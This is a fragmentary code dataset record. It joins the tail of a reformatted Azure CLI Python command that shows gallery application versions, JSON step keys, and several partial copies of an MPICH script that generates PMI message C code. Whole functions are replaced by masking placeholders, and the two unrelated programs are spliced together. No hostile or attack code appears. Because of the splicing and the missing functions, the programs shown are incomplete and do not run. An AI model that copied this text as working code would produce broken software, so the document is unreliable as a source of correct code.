@classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n return\n (cls._schema_encryption_images_read) = (_schema_encryption_images_read\n ) = AAZObjectType()\n encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(serialized_name\n ='dataDiskImages')\n encryption_images_read.os_disk_image = AAZObjectType(serialized_name\n ='osDiskImage')\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n _element.lun = AAZIntType(flags={'required': True})\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n os_disk_image.security_profile = AAZObjectType(serialized_name=\n 'securityProfile')\n security_profile = (_schema_encryption_images_read.os_disk_image.\n security_profile)\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name='confidentialVMEncryptionType')\n security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name='secureVMDiskEncryptionSetId')\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n\n\n<mask token>\n",
"step-5": "# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n#\n# Code generated by aaz-dev-tools\n# --------------------------------------------------------------------------------------------\n\n# pylint: skip-file\n# flake8: noqa\n\nfrom azure.cli.core.aaz import *\n\n\n@register_command(\n \"sig gallery-application version show\",\n)\nclass Show(AAZCommand):\n \"\"\"Get information about a gallery application version.\n \"\"\"\n\n _aaz_info = {\n \"version\": \"2022-01-03\",\n \"resources\": [\n [\"mgmt-plane\", \"/subscriptions/{}/resourcegroups/{}/providers/microsoft.compute/galleries/{}/applications/{}/versions/{}\", \"2022-01-03\"],\n ]\n }\n\n def _handler(self, command_args):\n super()._handler(command_args)\n self._execute_operations()\n return self._output()\n\n _args_schema = None\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n\n # define Arg Group \"\"\n\n _args_schema = cls._args_schema\n _args_schema.gallery_application_name = AAZStrArg(\n options=[\"--application-name\", \"--gallery-application-name\"],\n help=\"The name of the gallery application.\",\n required=True,\n id_part=\"child_name_1\",\n )\n _args_schema.gallery_application_version_name = AAZStrArg(\n options=[\"-n\", \"--name\", \"--version-name\", \"--gallery-application-version-name\"],\n help=\"The name of the gallery application version.\",\n required=True,\n id_part=\"child_name_2\",\n )\n _args_schema.gallery_name = AAZStrArg(\n options=[\"-r\", \"--gallery-name\"],\n help=\"Gallery name.\",\n required=True,\n id_part=\"name\",\n )\n _args_schema.resource_group = AAZResourceGroupNameArg(\n help=\"Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.\",\n required=True,\n )\n _args_schema.expand = AAZStrArg(\n options=[\"--expand\"],\n help=\"The expand expression to apply on the operation. \\\"ReplicationStatus\\\" Default value is None.\",\n enum={\"ReplicationStatus\": \"ReplicationStatus\"},\n )\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.GalleryApplicationVersionsGet(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n\n @register_callback\n def post_operations(self):\n pass\n\n def _output(self, *args, **kwargs):\n result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)\n return result\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = \"MgmtClient\"\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}\",\n **self.url_parameters\n )\n\n @property\n def method(self):\n return \"GET\"\n\n @property\n def error_format(self):\n return \"ODataV4Format\"\n\n @property\n def url_parameters(self):\n parameters = {\n **self.serialize_url_param(\n \"galleryApplicationName\", self.ctx.args.gallery_application_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"galleryApplicationVersionName\", self.ctx.args.gallery_application_version_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"galleryName\", self.ctx.args.gallery_name,\n required=True,\n ),\n **self.serialize_url_param(\n \"resourceGroupName\", self.ctx.args.resource_group,\n required=True,\n ),\n **self.serialize_url_param(\n \"subscriptionId\", self.ctx.subscription_id,\n required=True,\n ),\n }\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {\n **self.serialize_query_param(\n \"$expand\", self.ctx.args.expand,\n ),\n **self.serialize_query_param(\n \"api-version\", \"2022-01-03\",\n required=True,\n ),\n }\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {\n **self.serialize_header_param(\n \"Accept\", \"application/json\",\n ),\n }\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var(\n \"instance\",\n data,\n schema_builder=self._build_schema_on_200\n )\n\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n\n cls._schema_on_200 = AAZObjectType()\n\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(\n flags={\"read_only\": True},\n )\n _schema_on_200.location = AAZStrType(\n flags={\"required\": True},\n )\n _schema_on_200.name = AAZStrType(\n flags={\"read_only\": True},\n )\n _schema_on_200.properties = AAZObjectType(\n flags={\"client_flatten\": True},\n )\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(\n flags={\"read_only\": True},\n )\n\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(\n serialized_name=\"provisioningState\",\n flags={\"read_only\": True},\n )\n properties.publishing_profile = AAZObjectType(\n serialized_name=\"publishingProfile\",\n flags={\"required\": True},\n )\n properties.replication_status = AAZObjectType(\n serialized_name=\"replicationStatus\",\n )\n\n publishing_profile = cls._schema_on_200.properties.publishing_profile\n publishing_profile.advanced_settings = AAZDictType(\n serialized_name=\"advancedSettings\",\n )\n publishing_profile.enable_health_check = AAZBoolType(\n serialized_name=\"enableHealthCheck\",\n )\n publishing_profile.end_of_life_date = AAZStrType(\n serialized_name=\"endOfLifeDate\",\n )\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name=\"excludeFromLatest\",\n )\n publishing_profile.manage_actions = AAZObjectType(\n serialized_name=\"manageActions\",\n )\n publishing_profile.published_date = AAZStrType(\n serialized_name=\"publishedDate\",\n flags={\"read_only\": True},\n )\n publishing_profile.replica_count = AAZIntType(\n serialized_name=\"replicaCount\",\n )\n publishing_profile.replication_mode = AAZStrType(\n serialized_name=\"replicationMode\",\n )\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = AAZObjectType(\n flags={\"required\": True},\n )\n publishing_profile.storage_account_type = AAZStrType(\n serialized_name=\"storageAccountType\",\n )\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name=\"targetExtendedLocations\",\n )\n publishing_profile.target_regions = AAZListType(\n serialized_name=\"targetRegions\",\n )\n\n advanced_settings = cls._schema_on_200.properties.publishing_profile.advanced_settings\n advanced_settings.Element = AAZStrType()\n\n manage_actions = cls._schema_on_200.properties.publishing_profile.manage_actions\n manage_actions.install = AAZStrType(\n flags={\"required\": True},\n )\n manage_actions.remove = AAZStrType(\n flags={\"required\": True},\n )\n manage_actions.update = AAZStrType()\n\n settings = cls._schema_on_200.properties.publishing_profile.settings\n settings.config_file_name = AAZStrType(\n serialized_name=\"configFileName\",\n )\n settings.package_file_name = AAZStrType(\n serialized_name=\"packageFileName\",\n )\n\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(\n serialized_name=\"defaultConfigurationLink\",\n )\n source.media_link = AAZStrType(\n serialized_name=\"mediaLink\",\n flags={\"required\": True},\n )\n\n target_extended_locations = cls._schema_on_200.properties.publishing_profile.target_extended_locations\n target_extended_locations.Element = AAZObjectType()\n\n _element = cls._schema_on_200.properties.publishing_profile.target_extended_locations.Element\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.encryption)\n _element.extended_location = AAZObjectType(\n serialized_name=\"extendedLocation\",\n )\n _element.extended_location_replica_count = AAZIntType(\n serialized_name=\"extendedLocationReplicaCount\",\n )\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(\n serialized_name=\"storageAccountType\",\n )\n\n extended_location = cls._schema_on_200.properties.publishing_profile.target_extended_locations.Element.extended_location\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n\n target_regions = cls._schema_on_200.properties.publishing_profile.target_regions\n target_regions.Element = AAZObjectType()\n\n _element = cls._schema_on_200.properties.publishing_profile.target_regions.Element\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.encryption)\n _element.name = AAZStrType(\n flags={\"required\": True},\n )\n _element.regional_replica_count = AAZIntType(\n serialized_name=\"regionalReplicaCount\",\n )\n _element.storage_account_type = AAZStrType(\n serialized_name=\"storageAccountType\",\n )\n\n replication_status = cls._schema_on_200.properties.replication_status\n replication_status.aggregated_state = AAZStrType(\n serialized_name=\"aggregatedState\",\n flags={\"read_only\": True},\n )\n replication_status.summary = AAZListType(\n flags={\"read_only\": True},\n )\n\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n\n _element = cls._schema_on_200.properties.replication_status.summary.Element\n _element.details = AAZStrType(\n flags={\"read_only\": True},\n )\n _element.progress = AAZIntType(\n flags={\"read_only\": True},\n )\n _element.region = AAZStrType(\n flags={\"read_only\": True},\n )\n _element.state = AAZStrType(\n flags={\"read_only\": True},\n )\n\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n\n _schema_encryption_images_read = None\n\n @classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images\n _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image\n return\n\n cls._schema_encryption_images_read = _schema_encryption_images_read = AAZObjectType()\n\n encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(\n serialized_name=\"dataDiskImages\",\n )\n encryption_images_read.os_disk_image = AAZObjectType(\n serialized_name=\"osDiskImage\",\n )\n\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(\n serialized_name=\"diskEncryptionSetId\",\n )\n _element.lun = AAZIntType(\n flags={\"required\": True},\n )\n\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(\n serialized_name=\"diskEncryptionSetId\",\n )\n os_disk_image.security_profile = AAZObjectType(\n serialized_name=\"securityProfile\",\n )\n\n security_profile = _schema_encryption_images_read.os_disk_image.security_profile\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name=\"confidentialVMEncryptionType\",\n )\n security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name=\"secureVMDiskEncryptionSetId\",\n )\n\n _schema.data_disk_images = cls._schema_encryption_images_read.data_disk_images\n _schema.os_disk_image = cls._schema_encryption_images_read.os_disk_image\n\n\n__all__ = [\"Show\"]\n",
"step-ids": [
5,
8,
9,
10,
16
]
}
|
[
5,
8,
9,
10,
16
] |
<|reserved_special_token_0|>
class G:
pmi_vers = []
cmd_list = []
cmd_hash = {}
class RE:
m = None
def match(pat, str, flags=0):
RE.m = re.match(pat, str, flags)
return RE.m
def search(pat, str, flags=0):
RE.m = re.search(pat, str, flags)
return RE.m
<|reserved_special_token_0|>
def dump_all():
def dump_enums(Out):
print('enum PMIU_CMD_ID {', file=Out)
print(' PMIU_CMD_INVALID,', file=Out)
for NAME in G.cmd_list:
print(' PMIU_CMD_%s,' % NAME, file=Out)
print('};', file=Out)
print('', file=Out)
def dump_decls(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
decls = []
if 'query-name' in v0:
if len(v0['query-attrs']):
params = get_set_params(v0['query-attrs'])
decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (
name, std_query, params))
params = get_get_params(v0['query-attrs'])
decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (
name, std_get, params))
if 'response-name' in v0:
if len(v0['response-attrs']):
params = get_set_params(v0['response-attrs'])
decls.append('int PMIU_msg_set_response_%s(%s, %s);' %
(name, std_response, params))
params = get_get_params(v0['response-attrs'])
decls.append('int PMIU_msg_get_response_%s(%s, %s);' %
(name, std_get, params))
if len(decls):
print('/* PMIU_CMD_%s */' % NAME, file=Out)
for l in decls:
print(l, file=Out)
def dump_cmd_to_id(Out):
print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)
print('{', file=Out)
t_if = ' if'
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and 'query-name' in v[NAME]:
t = v[NAME]['query-name']
if t not in prev:
cmp_list.append('strcmp(cmd, "%s") == 0' % t)
prev[t] = 1
if len(cmp_list):
print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)
print(' return PMIU_CMD_%s;' % NAME, file=Out)
t_if = ' } else if'
print(' } else {', file=Out)
print(' return PMIU_CMD_INVALID;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_str(Out, query):
namekey = query + '-name'
print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %
query, file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and namekey in v[NAME]:
t = v[NAME][namekey]
if t not in prev:
cmp_list.append(t)
prev[t] = 1
if len(cmp_list) > 0:
print(' case PMIU_CMD_%s:' % NAME, file=Out)
if len(cmp_list) == 1:
print(' return "%s";' % cmp_list[0], file=Out)
else:
print(
' return (version == PMIU_WIRE_V1) ? "%s" : "%s";'
% (cmp_list[0], cmp_list[1]), file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_response(Out):
print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',
file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_funcs(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
def dump_if_version(t_if, version, is_set, is_query):
if re.match('1\\.', version):
ver = 'PMIU_WIRE_V1'
else:
ver = 'PMIU_WIRE_V2'
if is_set:
if is_query:
print(t_if + ' (version == %s) {' % ver, file=Out)
else:
print(t_if + ' (pmi_query->version == %s) {' % ver,
file=Out)
else:
print(t_if + ' (pmi->version == %s) {' % ver, file=Out)
def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
non_optional = 0
for i in range(len(attrs)):
a = attrs[i]
var = get_var(attrs0[i][0])
if is_query:
pmi = 'pmi_query'
else:
pmi = 'pmi_resp'
if a[1] == 'INTEGER':
kind = 'int'
elif a[1] == 'STRING':
kind = 'str'
elif a[1] == 'BOOLEAN':
kind = 'bool'
else:
raise Exception('Unhandled kind: ' + a[1])
if is_set:
pmiu = 'PMIU_cmd_add_' + kind
print(spaces + '%s(%s, "%s", %s);' % (pmiu, pmi, a[0],
var), file=Out)
elif RE.match('.*optional=(\\S+)', a[2]):
dflt = RE.m.group(1)
pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s, %s);' % (pmiu, a[0],
var, dflt), file=Out)
else:
pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s);' % (pmiu, a[0], var
), file=Out)
non_optional += 1
return non_optional
def dump_it(NAME, v_list, is_set, is_query, attrs):
print('', file=Out)
ret_errno = True
if is_set:
params = get_set_params(attrs)
if is_query:
ret_errno = False
print('void PMIU_msg_set_query_%s(%s, %s)' % (name,
std_query, params), file=Out)
else:
print('int PMIU_msg_set_response_%s(%s, %s)' % (name,
std_response, params), file=Out)
else:
params = get_get_params(attrs)
if is_query:
print('int PMIU_msg_get_query_%s(%s, %s)' % (name,
std_get, params), file=Out)
else:
print('int PMIU_msg_get_response_%s(%s, %s)' % (name,
std_get, params), file=Out)
print('{', file=Out)
if ret_errno:
print(' int pmi_errno = PMIU_SUCCESS;', file=Out)
print('', file=Out)
if is_set:
if is_query:
print(
' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'
% NAME, file=Out)
else:
print(
' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %
NAME, file=Out)
print(
' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'
, file=Out)
attrs_b = None
if len(v_list) > 1:
if is_query:
attrs_b = v_list[1]['query-attrs']
else:
attrs_b = v_list[1]['response-attrs']
non_optional = 0
if attrs_b is None or attrs_identical(attrs, attrs_b):
non_optional += dump_attrs(' ', is_set, is_query, attrs,
attrs)
else:
dump_if_version(' if', v_list[0]['version'], is_set,
is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs, attrs)
dump_if_version(' } else if', v_list[1]['version'],
is_set, is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs_b, attrs)
if ret_errno:
print(' } else {', file=Out)
print(
' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, "invalid version");'
, file=Out)
non_optional += 1
print(' }', file=Out)
if non_optional > 0:
print('', file=Out)
print(' fn_exit:', file=Out)
print(' return pmi_errno;', file=Out)
print(' fn_fail:', file=Out)
print(' goto fn_exit;', file=Out)
elif ret_errno:
print('', file=Out)
print(' return pmi_errno;', file=Out)
print('}', file=Out)
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
if 'query-name' in v0:
if len(v0['query-attrs']):
dump_it(NAME, v_list, True, True, v0['query-attrs'])
dump_it(NAME, v_list, False, True, v0['query-attrs'])
if 'response-name' in v0:
if len(v0['response-attrs']):
dump_it(NAME, v_list, True, False, v0['response-attrs'])
dump_it(NAME, v_list, False, False, v0['response-attrs'])
msg_h = 'src/pmi_msg.h'
msg_c = 'src/pmi_msg.c'
with open(msg_h, 'w') as Out:
dump_copyright(Out)
INC = get_include_guard(msg_h)
print('#ifndef %s' % INC, file=Out)
print('#define %s' % INC, file=Out)
print('', file=Out)
dump_enums(Out)
print('', file=Out)
dump_decls(Out)
print('', file=Out)
print('#endif /* %s */' % INC, file=Out)
with open(msg_c, 'w') as Out:
dump_copyright(Out)
for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',
'pmi_wire', 'pmi_msg']:
print('#include "%s.h"\n' % inc, file=Out)
dump_cmd_to_id(Out)
print('', file=Out)
dump_id_to_str(Out, 'query')
print('', file=Out)
dump_id_to_str(Out, 'response')
print('', file=Out)
dump_funcs(Out)
<|reserved_special_token_0|>
def get_var(name):
return name.replace('-', '_')
def get_kind(kind):
if kind == 'INTEGER':
return 'int '
elif kind == 'STRING':
return 'const char *'
elif kind == 'BOOLEAN':
return 'bool '
else:
raise Exception('unexpected kind ' + kind)
<|reserved_special_token_0|>
def get_include_guard(h_file):
h_file = re.sub('.*\\/', '', h_file)
h_file = re.sub('\\.', '_', h_file)
return h_file.upper() + '_INCLUDED'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class G:
pmi_vers = []
cmd_list = []
cmd_hash = {}
class RE:
m = None
def match(pat, str, flags=0):
RE.m = re.match(pat, str, flags)
return RE.m
def search(pat, str, flags=0):
RE.m = re.search(pat, str, flags)
return RE.m
def main():
load_pmi_txt('maint/pmi-1.1.txt', '1.1')
load_pmi_txt('maint/pmi-2.0.txt', '2.0')
dump_all()
<|reserved_special_token_0|>
def dump_all():
def dump_enums(Out):
print('enum PMIU_CMD_ID {', file=Out)
print(' PMIU_CMD_INVALID,', file=Out)
for NAME in G.cmd_list:
print(' PMIU_CMD_%s,' % NAME, file=Out)
print('};', file=Out)
print('', file=Out)
def dump_decls(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
decls = []
if 'query-name' in v0:
if len(v0['query-attrs']):
params = get_set_params(v0['query-attrs'])
decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (
name, std_query, params))
params = get_get_params(v0['query-attrs'])
decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (
name, std_get, params))
if 'response-name' in v0:
if len(v0['response-attrs']):
params = get_set_params(v0['response-attrs'])
decls.append('int PMIU_msg_set_response_%s(%s, %s);' %
(name, std_response, params))
params = get_get_params(v0['response-attrs'])
decls.append('int PMIU_msg_get_response_%s(%s, %s);' %
(name, std_get, params))
if len(decls):
print('/* PMIU_CMD_%s */' % NAME, file=Out)
for l in decls:
print(l, file=Out)
def dump_cmd_to_id(Out):
print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)
print('{', file=Out)
t_if = ' if'
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and 'query-name' in v[NAME]:
t = v[NAME]['query-name']
if t not in prev:
cmp_list.append('strcmp(cmd, "%s") == 0' % t)
prev[t] = 1
if len(cmp_list):
print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)
print(' return PMIU_CMD_%s;' % NAME, file=Out)
t_if = ' } else if'
print(' } else {', file=Out)
print(' return PMIU_CMD_INVALID;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_str(Out, query):
namekey = query + '-name'
print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %
query, file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and namekey in v[NAME]:
t = v[NAME][namekey]
if t not in prev:
cmp_list.append(t)
prev[t] = 1
if len(cmp_list) > 0:
print(' case PMIU_CMD_%s:' % NAME, file=Out)
if len(cmp_list) == 1:
print(' return "%s";' % cmp_list[0], file=Out)
else:
print(
' return (version == PMIU_WIRE_V1) ? "%s" : "%s";'
% (cmp_list[0], cmp_list[1]), file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_response(Out):
print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',
file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_funcs(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
def dump_if_version(t_if, version, is_set, is_query):
if re.match('1\\.', version):
ver = 'PMIU_WIRE_V1'
else:
ver = 'PMIU_WIRE_V2'
if is_set:
if is_query:
print(t_if + ' (version == %s) {' % ver, file=Out)
else:
print(t_if + ' (pmi_query->version == %s) {' % ver,
file=Out)
else:
print(t_if + ' (pmi->version == %s) {' % ver, file=Out)
def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
non_optional = 0
for i in range(len(attrs)):
a = attrs[i]
var = get_var(attrs0[i][0])
if is_query:
pmi = 'pmi_query'
else:
pmi = 'pmi_resp'
if a[1] == 'INTEGER':
kind = 'int'
elif a[1] == 'STRING':
kind = 'str'
elif a[1] == 'BOOLEAN':
kind = 'bool'
else:
raise Exception('Unhandled kind: ' + a[1])
if is_set:
pmiu = 'PMIU_cmd_add_' + kind
print(spaces + '%s(%s, "%s", %s);' % (pmiu, pmi, a[0],
var), file=Out)
elif RE.match('.*optional=(\\S+)', a[2]):
dflt = RE.m.group(1)
pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s, %s);' % (pmiu, a[0],
var, dflt), file=Out)
else:
pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s);' % (pmiu, a[0], var
), file=Out)
non_optional += 1
return non_optional
def dump_it(NAME, v_list, is_set, is_query, attrs):
print('', file=Out)
ret_errno = True
if is_set:
params = get_set_params(attrs)
if is_query:
ret_errno = False
print('void PMIU_msg_set_query_%s(%s, %s)' % (name,
std_query, params), file=Out)
else:
print('int PMIU_msg_set_response_%s(%s, %s)' % (name,
std_response, params), file=Out)
else:
params = get_get_params(attrs)
if is_query:
print('int PMIU_msg_get_query_%s(%s, %s)' % (name,
std_get, params), file=Out)
else:
print('int PMIU_msg_get_response_%s(%s, %s)' % (name,
std_get, params), file=Out)
print('{', file=Out)
if ret_errno:
print(' int pmi_errno = PMIU_SUCCESS;', file=Out)
print('', file=Out)
if is_set:
if is_query:
print(
' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'
% NAME, file=Out)
else:
print(
' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %
NAME, file=Out)
print(
' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'
, file=Out)
attrs_b = None
if len(v_list) > 1:
if is_query:
attrs_b = v_list[1]['query-attrs']
else:
attrs_b = v_list[1]['response-attrs']
non_optional = 0
if attrs_b is None or attrs_identical(attrs, attrs_b):
non_optional += dump_attrs(' ', is_set, is_query, attrs,
attrs)
else:
dump_if_version(' if', v_list[0]['version'], is_set,
is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs, attrs)
dump_if_version(' } else if', v_list[1]['version'],
is_set, is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs_b, attrs)
if ret_errno:
print(' } else {', file=Out)
print(
' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, "invalid version");'
, file=Out)
non_optional += 1
print(' }', file=Out)
if non_optional > 0:
print('', file=Out)
print(' fn_exit:', file=Out)
print(' return pmi_errno;', file=Out)
print(' fn_fail:', file=Out)
print(' goto fn_exit;', file=Out)
elif ret_errno:
print('', file=Out)
print(' return pmi_errno;', file=Out)
print('}', file=Out)
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
if 'query-name' in v0:
if len(v0['query-attrs']):
dump_it(NAME, v_list, True, True, v0['query-attrs'])
dump_it(NAME, v_list, False, True, v0['query-attrs'])
if 'response-name' in v0:
if len(v0['response-attrs']):
dump_it(NAME, v_list, True, False, v0['response-attrs'])
dump_it(NAME, v_list, False, False, v0['response-attrs'])
msg_h = 'src/pmi_msg.h'
msg_c = 'src/pmi_msg.c'
with open(msg_h, 'w') as Out:
dump_copyright(Out)
INC = get_include_guard(msg_h)
print('#ifndef %s' % INC, file=Out)
print('#define %s' % INC, file=Out)
print('', file=Out)
dump_enums(Out)
print('', file=Out)
dump_decls(Out)
print('', file=Out)
print('#endif /* %s */' % INC, file=Out)
with open(msg_c, 'w') as Out:
dump_copyright(Out)
for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',
'pmi_wire', 'pmi_msg']:
print('#include "%s.h"\n' % inc, file=Out)
dump_cmd_to_id(Out)
print('', file=Out)
dump_id_to_str(Out, 'query')
print('', file=Out)
dump_id_to_str(Out, 'response')
print('', file=Out)
dump_funcs(Out)
def get_set_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
tlist.append(get_kind(a[1]) + get_var(a[0]))
return ', '.join(tlist)
<|reserved_special_token_0|>
def get_var(name):
return name.replace('-', '_')
def get_kind(kind):
if kind == 'INTEGER':
return 'int '
elif kind == 'STRING':
return 'const char *'
elif kind == 'BOOLEAN':
return 'bool '
else:
raise Exception('unexpected kind ' + kind)
<|reserved_special_token_0|>
def dump_copyright(out):
print('/*', file=out)
print(' * Copyright (C) by Argonne National Laboratory', file=out)
print(' * See COPYRIGHT in top-level directory', file=out)
print(' */', file=out)
print('', file=out)
print('/* ** This file is auto-generated, do not edit ** */', file=out)
print('', file=out)
def get_include_guard(h_file):
h_file = re.sub('.*\\/', '', h_file)
h_file = re.sub('\\.', '_', h_file)
return h_file.upper() + '_INCLUDED'
